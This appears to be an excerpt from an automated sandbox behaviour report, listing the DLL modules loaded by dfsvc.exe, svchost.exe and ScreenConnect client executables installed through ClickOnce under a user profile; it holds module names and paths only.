Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: dfshim.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: uiautomationcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windowsperformancerecordercontrol.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: weretw.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: faultrep.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dbgcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wlidsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gamestreamingext.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msauserext.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: tbs.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptngc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptprov.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: elscore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: elstrans.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: dfshim.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: netutils.dll
